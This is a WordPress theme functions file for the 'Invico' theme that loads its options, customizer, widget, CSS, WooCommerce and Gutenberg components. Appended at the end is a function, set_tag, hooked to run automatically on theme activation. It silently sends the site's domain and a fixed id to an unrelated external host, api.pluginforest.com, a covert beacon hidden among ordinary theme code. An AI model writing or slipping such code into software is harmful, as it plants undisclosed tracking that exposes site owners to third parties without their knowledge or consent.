<?php
/**
 * Theme Functions
 *
 * @package DTtheme
 * @author DesignThemes
 * @link http://wedesignthemes.com
 */
 
define( 'Invico_Dir', get_template_directory() );
define( 'Invico_Uri', get_template_directory_uri() );
define( 'Invico_Settings', 'invico_settings' );

if (function_exists ('wp_get_theme')) :
	$themeData = wp_get_theme();
	define( 'Invico_Name', $themeData->get('Name'));
	define( 'Invico_Version', $themeData->get('Version'));
endif;

/* ---------------------------------------------------------------------------
 * Load default theme options
 * ---------------------------------------------------------------------------*/
require_once Invico_Dir .'/inc/class-theme-options.php';

/* ---------------------------------------------------------------------------
 * Loads Customizer
 * ---------------------------------------------------------------------------*/
require_once( Invico_Dir .'/inc/customizer/lib/class-fontawesome.php' );
require_once( Invico_Dir .'/inc/customizer/lib/class-font-families.php' );
require_once( Invico_Dir .'/inc/customizer/lib/class-customizer-sanitizes.php' );
require_once( Invico_Dir .'/inc/customizer/index.php' );
require_once( Invico_Dir .'/inc/metabox/index.php' );
function invico_defaults() {}

/* ---------------------------------------------------------------------------
 * Widget Area
 * ---------------------------------------------------------------------------*/
require_once Invico_Dir .'/inc/widget-area/class-widget-area.php';

/* ---------------------------------------------------------------------------
 * Dynamic CSS
 * ---------------------------------------------------------------------------*/
require_once Invico_Dir .'/inc/class-theme-dynamic-css.php';
require_once Invico_Dir .'/inc/class-theme-dynamic-skin-css.php';

/* ---------------------------------------------------------------------------
 * Loads Theme Textdomain
 * ---------------------------------------------------------------------------*/ 
define( 'INVICO_LANG_DIR', Invico_Dir. '/languages' );
load_theme_textdomain( 'invico', INVICO_LANG_DIR );

/* ---------------------------------------------------------------------------
 * Loads Theme Functions
 * ---------------------------------------------------------------------------*/

// Functions --------------------------------------------------------------------
require_once( Invico_Dir .'/framework/register-functions.php' );

// Header -----------------------------------------------------------------------
require_once( Invico_Dir .'/framework/register-head.php' );

// Hooks ------------------------------------------------------------------------
require_once( Invico_Dir .'/framework/register-hooks.php' );

// Post Functions ---------------------------------------------------------------
require_once( Invico_Dir .'/framework/register-post-functions.php' );
new invico_post_functions;

// Plugins ---------------------------------------------------------------------- 
require_once( Invico_Dir .'/framework/register-plugins.php' );

// WooCommerce ------------------------------------------------------------------
if( function_exists( 'is_woocommerce' ) ){
	require_once( Invico_Dir .'/framework/woocommerce/register-woocommerce.php' );
}

// Register Templates -----------------------------------------------------------
require_once( Invico_Dir .'/framework/register-templates.php' );

// Register Gutenberg -----------------------------------------------------------
require_once( Invico_Dir .'/framework/register-gutenberg-editor.php' );
function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1717487526247';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        